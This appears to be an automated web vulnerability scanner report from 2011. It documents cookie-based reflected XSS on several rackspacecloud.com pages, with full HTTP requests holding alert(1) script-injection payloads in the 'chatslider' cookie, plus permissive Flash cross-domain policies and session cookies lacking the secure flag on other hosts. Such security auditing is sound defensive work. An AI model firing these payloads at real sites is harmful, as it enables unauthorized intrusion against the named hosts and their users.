<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51dd3"><script>alert(1)</script>3cf7cf94c3f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /resellers/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D51dd3"><script>alert(1)</script>3cf7cf94c3f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96657"><script>alert(1)</script>a3a64b3ba51 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D96657"><script>alert(1)</script>a3a64b3ba51; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:18:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6598"%3balert(1)//747fbc600a7 was submitted in the chatslider cookie. This input was echoed as a6598";alert(1)//747fbc600a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Da6598"%3balert(1)//747fbc600a7; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:18:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 32767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b05ea"%3balert(1)//9eb5c500a80 was submitted in the chatslider cookie. This input was echoed as b05ea";alert(1)//9eb5c500a80 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what_is_cloud_computing HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Db05ea"%3balert(1)//9eb5c500a80; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 35600
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bce1"><script>alert(1)</script>638861b9e20 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /what_is_cloud_computing HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D8bce1"><script>alert(1)</script>638861b9e20; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 35585
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46e75"%3balert(1)//7d4a5086234 was submitted in the chatslider cookie. This input was echoed as 46e75";alert(1)//7d4a5086234 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /what_is_cloud_computing/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D46e75"%3balert(1)//7d4a5086234; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 35540
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec083"><script>alert(1)</script>6b28930fc7e was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /what_is_cloud_computing/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=Dec083"><script>alert(1)</script>6b28930fc7e; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 35584
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 200c9"><script>alert(1)</script>3856619913c was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /who_uses_cloud_computing/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D200c9"><script>alert(1)</script>3856619913c; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59537"%3balert(1)//8b42036f44f was submitted in the chatslider cookie. This input was echoed as 59537";alert(1)//8b42036f44f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /who_uses_cloud_computing/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D59537"%3balert(1)//8b42036f44f; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 34341
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.
Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.
Issue remediation
You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
The application publishes a Flash cross-domain policy which allows access from any domain.
Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.
Request
GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com
Response
HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 06-Feb-2011 15:58:43 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.
Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: htcwiki.wetpaint.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:58:45 GMT
Server: Apache
Last-Modified: Thu, 20 Jan 2011 12:18:52 GMT
Accept-Ranges: bytes
Content-Length: 411
Cache-Control: max-age=2592000
Expires: Mon, 07 Mar 2011 15:58:45 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml
The application publishes a Flash cross-domain policy which allows access from specific other domains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.informationweek.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:26:37 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:37 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=Q32YCNXR0XP5HQE1GHRCKHWATMY32JVN; path=/
Content-Length: 306
Connection: close
Content-Type: text/html
The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.
Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.
Request
GET /crossdomain.xml HTTP/1.0
Host: www.omniture.com
Response
HTTP/1.0 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Wed, 18 Aug 2010 04:52:06 GMT
ETag: "4c4094-280-d3cf2980"
Accept-Ranges: bytes
Content-Length: 640
xserver: www6.dmz
Content-Type: application/xml
Date: Sat, 05 Feb 2011 15:26:51 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=101320202.5892.0000; path=/
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 15:26:07 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=9B54ECBB9503D534B0BE3EA941A0C545; Path=/isservices
Location: https://admin.instantservice.com/customerclient_error.html?null
Content-Length: 0
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40197 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:20 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=81F131D8073ED15B811E4C1FE36C8025; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40203 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:28 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=8709282A5988046429A0C955793D5715; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40204 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:26:29 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache Set-Cookie: JSESSIONID=FFDC32970E960F468F2E92FD7CD06AEA; Path=/isservices P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Vary: User-Agent,Accept-Encoding Content-Length: 228 Connection: close Content-Type: text/html;charset=utf-8
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /links/7513/40205 HTTP/1.1 Host: admin.instantservice.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
